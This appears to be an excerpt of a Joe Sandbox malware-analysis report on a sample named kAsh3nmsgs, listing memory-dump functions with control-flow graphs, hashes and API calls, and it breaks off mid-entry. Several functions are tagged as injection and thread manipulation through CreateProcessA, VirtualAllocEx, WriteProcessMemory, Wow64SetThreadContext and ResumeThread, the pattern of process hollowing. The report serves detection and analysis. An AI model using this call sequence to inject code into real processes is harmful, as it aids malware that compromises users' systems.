                                                                                                                Function 0A0452E8 Relevance: .2, Instructions: 184COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 500b431e5d6bc840465a0ae7f6d19ad2805f8969dbd045e32432aca0f49cdb4b
                                                                                                                • Instruction ID: 83b9677320c78be4f9299e46624ab04c92eb9b9419f07482eae65ccb887af5d1
                                                                                                                • Opcode Fuzzy Hash: 500b431e5d6bc840465a0ae7f6d19ad2805f8969dbd045e32432aca0f49cdb4b
                                                                                                                • Instruction Fuzzy Hash: F851DE6245E7E16FDB476B7C98B40C23FB0AE17264B0A00E7C4C0CF0A7E559588AD7A6
                                                                                                                Function 0F180123 Relevance: .0, Instructions: 50COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1737717003.000000000F180000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F180000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_f180000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8c71bcf18c2b231fd4f8540c95e55b0d54138fbc614802262c5f13e88fd7cb08
                                                                                                                • Instruction ID: 2f43fbda3d19937ca9c76df7dfd1d300632c664e81a396f9a54baa3aa84d0857
                                                                                                                • Opcode Fuzzy Hash: 8c71bcf18c2b231fd4f8540c95e55b0d54138fbc614802262c5f13e88fd7cb08
                                                                                                                • Instruction Fuzzy Hash: 1511367594921C8FDB24DF64CA80BE8BBB4BB0A300F0541E5D14DA7292D7709A99CF00
                                                                                                                Function 0A04CA65 Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1643 a04ca65-a04cb05 1645 a04cb07-a04cb11 1643->1645 1646 a04cb3e-a04cb5e 1643->1646 1645->1646 1647 a04cb13-a04cb15 1645->1647 1651 a04cb97-a04cbc6 1646->1651 1652 a04cb60-a04cb6a 1646->1652 1649 a04cb17-a04cb21 1647->1649 1650 a04cb38-a04cb3b 1647->1650 1653 a04cb25-a04cb34 1649->1653 1654 a04cb23 1649->1654 1650->1646 1660 a04cbff-a04ccb9 CreateProcessA 1651->1660 1661 a04cbc8-a04cbd2 1651->1661 1652->1651 1656 a04cb6c-a04cb6e 1652->1656 1653->1653 1655 a04cb36 1653->1655 1654->1653 1655->1650 1657 a04cb70-a04cb7a 1656->1657 1658 a04cb91-a04cb94 1656->1658 1662 a04cb7c 1657->1662 1663 a04cb7e-a04cb8d 1657->1663 1658->1651 1674 a04ccc2-a04cd48 1660->1674 1675 a04ccbb-a04ccc1 1660->1675 1661->1660 1664 a04cbd4-a04cbd6 1661->1664 1662->1663 1663->1663 1665 a04cb8f 1663->1665 1666 a04cbd8-a04cbe2 1664->1666 1667 a04cbf9-a04cbfc 1664->1667 1665->1658 1669 a04cbe4 1666->1669 1670 a04cbe6-a04cbf5 1666->1670 1667->1660 1669->1670 1670->1670 1671 a04cbf7 1670->1671 1671->1667 1685 a04cd58-a04cd5c 1674->1685 1686 a04cd4a-a04cd4e 1674->1686 1675->1674 1688 a04cd6c-a04cd70 1685->1688 1689 a04cd5e-a04cd62 1685->1689 1686->1685 1687 a04cd50 1686->1687 1687->1685 1691 a04cd80-a04cd84 1688->1691 1692 a04cd72-a04cd76 1688->1692 1689->1688 1690 a04cd64 1689->1690 1690->1688 1694 a04cd96-a04cd9d 1691->1694 1695 a04cd86-a04cd8c 1691->1695 1692->1691 1693 a04cd78 1692->1693 1693->1691 1696 a04cdb4 1694->1696 1697 a04cd9f-a04cdae 1694->1697 1695->1694 1699 a04cdb5 1696->1699 1697->1696 1699->1699
                                                                                                                APIs
                                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0A04CCA6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 963392458-0
                                                                                                                • Opcode ID: c1486e420f7e29e4574a409fb2daca9c1f60f1c0c6bbc4fb87619e57fcebebcf
                                                                                                                • Instruction ID: 471908ae9a39ad2b9a15177290308ce4c0dddb79c0b47943a60787cc3a0e85a2
                                                                                                                • Opcode Fuzzy Hash: c1486e420f7e29e4574a409fb2daca9c1f60f1c0c6bbc4fb87619e57fcebebcf
                                                                                                                • Instruction Fuzzy Hash: 2BA16AB1D0165D9FEB60CFA9C8417EDBBF2BF48310F0481AAE848A7250DB749985CF91
                                                                                                                Function 0A04CA70 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1700 a04ca70-a04cb05 1702 a04cb07-a04cb11 1700->1702 1703 a04cb3e-a04cb5e 1700->1703 1702->1703 1704 a04cb13-a04cb15 1702->1704 1708 a04cb97-a04cbc6 1703->1708 1709 a04cb60-a04cb6a 1703->1709 1706 a04cb17-a04cb21 1704->1706 1707 a04cb38-a04cb3b 1704->1707 1710 a04cb25-a04cb34 1706->1710 1711 a04cb23 1706->1711 1707->1703 1717 a04cbff-a04ccb9 CreateProcessA 1708->1717 1718 a04cbc8-a04cbd2 1708->1718 1709->1708 1713 a04cb6c-a04cb6e 1709->1713 1710->1710 1712 a04cb36 1710->1712 1711->1710 1712->1707 1714 a04cb70-a04cb7a 1713->1714 1715 a04cb91-a04cb94 1713->1715 1719 a04cb7c 1714->1719 1720 a04cb7e-a04cb8d 1714->1720 1715->1708 1731 a04ccc2-a04cd48 1717->1731 1732 a04ccbb-a04ccc1 1717->1732 1718->1717 1721 a04cbd4-a04cbd6 1718->1721 1719->1720 1720->1720 1722 a04cb8f 1720->1722 1723 a04cbd8-a04cbe2 1721->1723 1724 a04cbf9-a04cbfc 1721->1724 1722->1715 1726 a04cbe4 1723->1726 1727 a04cbe6-a04cbf5 1723->1727 1724->1717 1726->1727 1727->1727 1728 a04cbf7 1727->1728 1728->1724 1742 a04cd58-a04cd5c 1731->1742 1743 a04cd4a-a04cd4e 1731->1743 1732->1731 1745 a04cd6c-a04cd70 1742->1745 1746 a04cd5e-a04cd62 1742->1746 1743->1742 1744 a04cd50 1743->1744 1744->1742 1748 a04cd80-a04cd84 1745->1748 1749 a04cd72-a04cd76 1745->1749 1746->1745 1747 a04cd64 1746->1747 1747->1745 1751 a04cd96-a04cd9d 1748->1751 1752 a04cd86-a04cd8c 1748->1752 1749->1748 1750 a04cd78 1749->1750 1750->1748 1753 a04cdb4 1751->1753 1754 a04cd9f-a04cdae 1751->1754 1752->1751 1756 a04cdb5 1753->1756 1754->1753 1756->1756
                                                                                                                APIs
                                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0A04CCA6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 963392458-0
                                                                                                                • Opcode ID: 0c20154a4b38504133db2921263115e8f28fa36067c09dfeede759fc65e5e021
                                                                                                                • Instruction ID: e621c694eff38b1114294f0156dc65b94c4c47556955c994793494cdd0e7be3e
                                                                                                                • Opcode Fuzzy Hash: 0c20154a4b38504133db2921263115e8f28fa36067c09dfeede759fc65e5e021
                                                                                                                • Instruction Fuzzy Hash: 269168B1D0165D9FEB20CFA9C8417EDBBF2BF48310F1481AAE808A7250DB749985CF91
                                                                                                                Function 01487CC4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1865 1487cc4-14891c9 CreateActCtxA 1868 14891cb-14891d1 1865->1868 1869 14891d2-148922c 1865->1869 1868->1869 1876 148923b-148923f 1869->1876 1877 148922e-1489231 1869->1877 1878 1489250 1876->1878 1879 1489241-148924d 1876->1879 1877->1876 1879->1878
                                                                                                                APIs
                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 014891B9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1729500262.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1480000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Create
                                                                                                                • String ID:
                                                                                                                • API String ID: 2289755597-0
                                                                                                                • Opcode ID: 2998b77c316391b991344a8359ada5d0c423f16dadc4a4ef9f091e28af7fa534
                                                                                                                • Instruction ID: ca3cd16faa06d45ab3ea5d32c094d524731fcb96367566ff7bdd8471af7f52d8
                                                                                                                • Opcode Fuzzy Hash: 2998b77c316391b991344a8359ada5d0c423f16dadc4a4ef9f091e28af7fa534
                                                                                                                • Instruction Fuzzy Hash: 9941F0B0C00619DFDB24DFA9C844BDEBBF5BF89304F24806AD408AB265DB756985CF90
                                                                                                                Function 09D59F78 Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1881 9d59f78-9d5ae44 1884 9d5ae46-9d5ae4c 1881->1884 1885 9d5ae4f-9d5ae5e 1881->1885 1884->1885 1886 9d5ae60 1885->1886 1887 9d5ae63-9d5ae9c DrawTextExW 1885->1887 1886->1887 1888 9d5aea5-9d5aec2 1887->1888 1889 9d5ae9e-9d5aea4 1887->1889 1889->1888
                                                                                                                APIs
                                                                                                                • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,09D5ADDD,?,?), ref: 09D5AE8F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1735315394.0000000009D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_9d50000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DrawText
                                                                                                                • String ID:
                                                                                                                • API String ID: 2175133113-0
                                                                                                                • Opcode ID: a150892ecc86454f63027c6c9c3eb89d1b34356cc464e257a8aca9a271d8046c
                                                                                                                • Instruction ID: a88fcb6c624294242681bf01331fb2422edab16738360363d60bf00d179b429f
                                                                                                                • Opcode Fuzzy Hash: a150892ecc86454f63027c6c9c3eb89d1b34356cc464e257a8aca9a271d8046c
                                                                                                                • Instruction Fuzzy Hash: ED3111B59003199FDB10CF9AD884ADEBBF4FF48320F14842AE919A7310D770A944CFA4
                                                                                                                Function 09D5ADF0 Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1892 9d5adf0-9d5ae44 1894 9d5ae46-9d5ae4c 1892->1894 1895 9d5ae4f-9d5ae5e 1892->1895 1894->1895 1896 9d5ae60 1895->1896 1897 9d5ae63-9d5ae9c DrawTextExW 1895->1897 1896->1897 1898 9d5aea5-9d5aec2 1897->1898 1899 9d5ae9e-9d5aea4 1897->1899 1899->1898
                                                                                                                APIs
                                                                                                                • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,09D5ADDD,?,?), ref: 09D5AE8F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1735315394.0000000009D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_9d50000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DrawText
                                                                                                                • String ID:
                                                                                                                • API String ID: 2175133113-0
                                                                                                                • Opcode ID: 9cdca4935c051eb6e9eeace07870ff4b764fac2e3b1a156bad7fab69a66b06de
                                                                                                                • Instruction ID: 6ec84a6ed4409173032ee1d7fe4f839535872b277315e8ac5eb4786d83f62d7a
                                                                                                                • Opcode Fuzzy Hash: 9cdca4935c051eb6e9eeace07870ff4b764fac2e3b1a156bad7fab69a66b06de
                                                                                                                • Instruction Fuzzy Hash: C131E0B5A002199FDF10CF9AD884ADEFBF5FF48320F14842AE819A7210D774A944CFA0
                                                                                                                Function 09D59F84 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,09D5ADDD,?,?), ref: 09D5AE8F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1735315394.0000000009D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_9d50000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DrawText
                                                                                                                • String ID:
                                                                                                                • API String ID: 2175133113-0
                                                                                                                • Opcode ID: 05155e7736336a8e2948b6391407bd45288651723af2a347004f6be52cf8f882
                                                                                                                • Instruction ID: 72bd47d347b17a86f851cc64061e128fe3df4c291fbf35bde20ebf35831d98a8
                                                                                                                • Opcode Fuzzy Hash: 05155e7736336a8e2948b6391407bd45288651723af2a347004f6be52cf8f882
                                                                                                                • Instruction Fuzzy Hash: 7E31C0B59002599FDF10CF9AD884A9EFBF5EB48320F14842AE919A7710D774A944CFA1
                                                                                                                Function 0A04C7E1 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0A04C878
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 3559483778-0
                                                                                                                • Opcode ID: 0b1570214f0c731d54715cdff1791f6fd613f1d3a8d7e31205f898ba405319ad
                                                                                                                • Instruction ID: 07b3fcab81cf9f4dccf0f93244889c15d89ead22cc8366ecc7bae28dfae005b0
                                                                                                                • Opcode Fuzzy Hash: 0b1570214f0c731d54715cdff1791f6fd613f1d3a8d7e31205f898ba405319ad
                                                                                                                • Instruction Fuzzy Hash: 522155B19002499FDB10CFA9C881BEEBFF1FF48310F108429E958A7251C7789945CF64
                                                                                                                Function 0A04C7E8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0A04C878
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 3559483778-0
                                                                                                                • Opcode ID: d8be5c160b179110cd35f4726826969edaf7c0ffe4832a8875f951ebaa6e7f22
                                                                                                                • Instruction ID: 75629f628094b2df2c46a521ee2a8bec1c4d27cb5d6d84647489521fbd2850d5
                                                                                                                • Opcode Fuzzy Hash: d8be5c160b179110cd35f4726826969edaf7c0ffe4832a8875f951ebaa6e7f22
                                                                                                                • Instruction Fuzzy Hash: 062144B19003499FDB10CFA9C881BDEBBF5FF48310F10842AE918A7250D778A944CFA4
                                                                                                                Function 0A04C8D0 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0A04C958
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 1726664587-0
                                                                                                                • Opcode ID: 9df07e260e29cba5a7db9350bfb2f40177c55d177f036e55cf9fc6f0bfd4c16d
                                                                                                                • Instruction ID: 612cde3817820a171fcac297758305af96b5966bf84b0beeb672cd10969066c2
                                                                                                                • Opcode Fuzzy Hash: 9df07e260e29cba5a7db9350bfb2f40177c55d177f036e55cf9fc6f0bfd4c16d
                                                                                                                • Instruction Fuzzy Hash: 6E2136B29003499FDB10CFAAC845AEEFBF5FF48320F108429E558A7250D738A945CFA5
                                                                                                                Function 0A04C648 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0A04C6CE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ContextThreadWow64
                                                                                                                • String ID:
                                                                                                                • API String ID: 983334009-0
                                                                                                                • Opcode ID: 77cfd891f5014ef17b07d374ce3a2e1d141667fdc6cee08ea451d9a2cf69dcd1
                                                                                                                • Instruction ID: cfe34901126539e14c09879478e20247afd4bdf344acdc93bef44ef82c9aa5d7
                                                                                                                • Opcode Fuzzy Hash: 77cfd891f5014ef17b07d374ce3a2e1d141667fdc6cee08ea451d9a2cf69dcd1
                                                                                                                • Instruction Fuzzy Hash: 4D2139B19002499FDB10CFA9C485BEEBBF5FF89314F14842AD459A7241C7789945CFA4
                                                                                                                Function 09D5EA60 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 09D5EADF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1735315394.0000000009D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_9d50000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FromMonitorPoint
                                                                                                                • String ID:
                                                                                                                • API String ID: 1566494148-0
                                                                                                                • Opcode ID: 56939dc48a7b213c54327841dbc0503dbd7d3436ce1bd224390c0af9d32dd922
                                                                                                                • Instruction ID: e02c741ffd50e3a4f8d7f6f05d11926a181fc49875e2e965c5f1187b3d15d524
                                                                                                                • Opcode Fuzzy Hash: 56939dc48a7b213c54327841dbc0503dbd7d3436ce1bd224390c0af9d32dd922
                                                                                                                • Instruction Fuzzy Hash: 14215EB5900218AFCB14EFA9D4057AEFBF5FB98310F10841AE856B7740C774A944CFA1
                                                                                                                Function 0A04C8D8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0A04C958
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 1726664587-0
                                                                                                                • Opcode ID: 3a1e5ab8af49471578c85190f916ce36808edb2d834253fce78417854c618b14
                                                                                                                • Instruction ID: 05dfaafdd4c1f70038146936527f30c32442fe2ef8013c4945388e0f52b67204
                                                                                                                • Opcode Fuzzy Hash: 3a1e5ab8af49471578c85190f916ce36808edb2d834253fce78417854c618b14
                                                                                                                • Instruction Fuzzy Hash: 932139B19003599FDB10DFAAC845AEEFBF5FF48310F108429E559A7250C7389944DFA5
                                                                                                                Function 0A04C650 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0A04C6CE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ContextThreadWow64
                                                                                                                • String ID:
                                                                                                                • API String ID: 983334009-0
                                                                                                                • Opcode ID: 13915a9d2f7c08bc30aba1b17088f9fb004d533b5ef2d4063bd623c1e0d77465
                                                                                                                • Instruction ID: 5f5bb9a3119df561b512ec5d4a2d7e70f9f52da8f35283b7a4f69378d5028d96
                                                                                                                • Opcode Fuzzy Hash: 13915a9d2f7c08bc30aba1b17088f9fb004d533b5ef2d4063bd623c1e0d77465
                                                                                                                • Instruction Fuzzy Hash: 772118B19002099FDB10DFAAC4857EEBBF4EF89324F14C42AD459A7241C778A945CFA5
                                                                                                                Function 09D5EA50 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 09D5EADF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1735315394.0000000009D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_9d50000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FromMonitorPoint
                                                                                                                • String ID:
                                                                                                                • API String ID: 1566494148-0
                                                                                                                • Opcode ID: 20066417437ddd69c9351eec7f63a52f39aa18c4176a0fee29046306c2828080
                                                                                                                • Instruction ID: e58ecea95fe0f21ff4949ea77c73d0ddfe4bf4a68575a771bcca9f35f6e6bf89
                                                                                                                • Opcode Fuzzy Hash: 20066417437ddd69c9351eec7f63a52f39aa18c4176a0fee29046306c2828080
                                                                                                                • Instruction Fuzzy Hash: A2214AB5900259AFCF10EFA9D4057EEBFB0FB49320F10845AE856AB641C735A944CFA5
                                                                                                                Function 0A04C720 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0A04C796
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4275171209-0
                                                                                                                • Opcode ID: c09b90a4ada6b92d0382423e415853194b83082cd41a142855267a8fa10c0e59
                                                                                                                • Instruction ID: 9c4605e3ba6d866d6ff966d6cbde678884bf3d7872c31ef2918f5ce0ddc2a059
                                                                                                                • Opcode Fuzzy Hash: c09b90a4ada6b92d0382423e415853194b83082cd41a142855267a8fa10c0e59
                                                                                                                • Instruction Fuzzy Hash: CA216AB18002499FDB10DFA9C8456DEBFF5EF49320F108829D455AB210C735A940CFA0
                                                                                                                Function 0A04C728 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0A04C796
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4275171209-0
                                                                                                                • Opcode ID: 2a1589743c9a980eba8453a2f5977352f610e3d3409720ff083879f8d6c91ddd
                                                                                                                • Instruction ID: fb8c111349a922ee224ed7c247c77983ad8e3cc7f1122b57adc65b5a253e4d60
                                                                                                                • Opcode Fuzzy Hash: 2a1589743c9a980eba8453a2f5977352f610e3d3409720ff083879f8d6c91ddd
                                                                                                                • Instruction Fuzzy Hash: EF1137B29002499FDB10DFAAC845BDEBFF5EF88320F108829E559A7250C775A944CFA5
                                                                                                                Function 0A04C599 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • ResumeThread.KERNELBASE(?), ref: 0A04C602
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ResumeThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 947044025-0
                                                                                                                • Opcode ID: 51a9dc97e0f6a9836466a3d6eaedcd0ce4a998a6730f8f2a118b9005cc1884b2
                                                                                                                • Instruction ID: 317d034e3fbb7b741f852fe3929e742eb3f7f2bb2694b60e73fe1474c970da55
                                                                                                                • Opcode Fuzzy Hash: 51a9dc97e0f6a9836466a3d6eaedcd0ce4a998a6730f8f2a118b9005cc1884b2
                                                                                                                • Instruction Fuzzy Hash: A6114CB19002888FDB20DFA9C4457EEFFF5AF89324F248469C499A7251CA395545CFA4
                                                                                                                Function 0F1811B0 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • PostMessageW.USER32(?,?,?,?), ref: 0F181215
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1737717003.000000000F180000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F180000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_f180000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePost
                                                                                                                • String ID:
                                                                                                                • API String ID: 410705778-0
                                                                                                                • Opcode ID: 1b8efb10bd1a68c50e4e39f39f24ad30652643d1de3c9583096152b8b9449d45
                                                                                                                • Instruction ID: 4255d4640e3b581e3f414dfef4d70823c8c2599ab45bf1c815c1bd24c43f235c
                                                                                                                • Opcode Fuzzy Hash: 1b8efb10bd1a68c50e4e39f39f24ad30652643d1de3c9583096152b8b9449d45
                                                                                                                • Instruction Fuzzy Hash: 021102B6800349AFDB10DF99C945BDEBBF8EB49320F108459D454A7201C375A985CFA1
                                                                                                                Function 0A04C5A0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • ResumeThread.KERNELBASE(?), ref: 0A04C602
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ResumeThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 947044025-0
                                                                                                                • Opcode ID: a72b7419f0a5484ce414a1bdd585e634072817d3723f7f0adcccd59f3ed41058
                                                                                                                • Instruction ID: e6cd3c2d088102666fc97e183b08ca952d89732b98ba7cb0ba19db1c8b7e5ad2
